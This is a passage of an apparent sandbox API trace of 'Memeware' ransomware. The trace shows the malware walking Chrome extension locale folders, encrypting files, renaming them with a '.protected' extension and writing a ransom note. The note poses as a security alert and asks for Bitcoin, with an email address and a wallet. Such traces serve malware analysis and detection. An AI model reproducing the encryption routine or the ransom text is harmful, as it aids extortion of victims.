lpString2="Program Files (x86)") returned -1 [0080.016] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.017] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\.") returned 143 [0080.017] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.017] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.017] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.017] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.017] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.017] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\..") returned 144 [0080.017] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.017] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.017] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.017] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.017] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.017] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.017] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json") returned 155 [0080.017] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.017] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.017] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.017] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json") returned 155 [0080.018] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json") returned 155 [0080.018] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json") returned 155 [0080.018] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.018] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0080.019] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.019] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0080.019] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.019] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.019] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.020] CloseHandle (hObject=0x168) returned 1 [0080.020] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.protected") returned 165 [0080.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.protected")) returned 1 [0080.020] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.020] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.020] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0080.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.021] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.021] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.021] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.021] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.021] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.022] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.022] CloseHandle (hObject=0x164) returned 1 [0080.022] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.022] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0080.022] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0080.022] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0080.022] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0080.022] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0080.022] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de") returned 141 [0080.022] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0080.022] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0080.022] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\*") returned 143 [0080.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.022] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.022] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.022] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.022] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.022] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.022] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\.") returned 143 [0080.022] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.022] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.022] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.023] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.023] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.023] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.023] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\..") returned 144 [0080.023] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.023] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.023] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json") returned 155 [0080.023] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.023] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.023] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json") returned 155 [0080.023] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.023] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json") returned 155 [0080.023] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.023] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json") returned 155 [0080.023] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.023] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdc, lpOverlapped=0x0) returned 1 [0080.024] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.024] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdc, lpOverlapped=0x0) returned 1 [0080.024] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.024] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.024] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.025] CloseHandle (hObject=0x168) returned 1 [0080.025] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.protected") returned 165 [0080.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.protected")) returned 1 [0080.025] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.025] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.025] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0080.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.026] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.026] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.026] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.026] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.026] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.026] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.026] CloseHandle (hObject=0x164) returned 1 [0080.026] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.027] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0080.027] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0080.027] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0080.027] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0080.027] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0080.027] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el") returned 141 [0080.027] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0080.027] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0080.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\*") returned 143 [0080.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.027] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.027] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.027] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.027] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.027] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\.") returned 143 [0080.027] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.027] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.027] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.027] lstrcmpiW (lpString1="..", 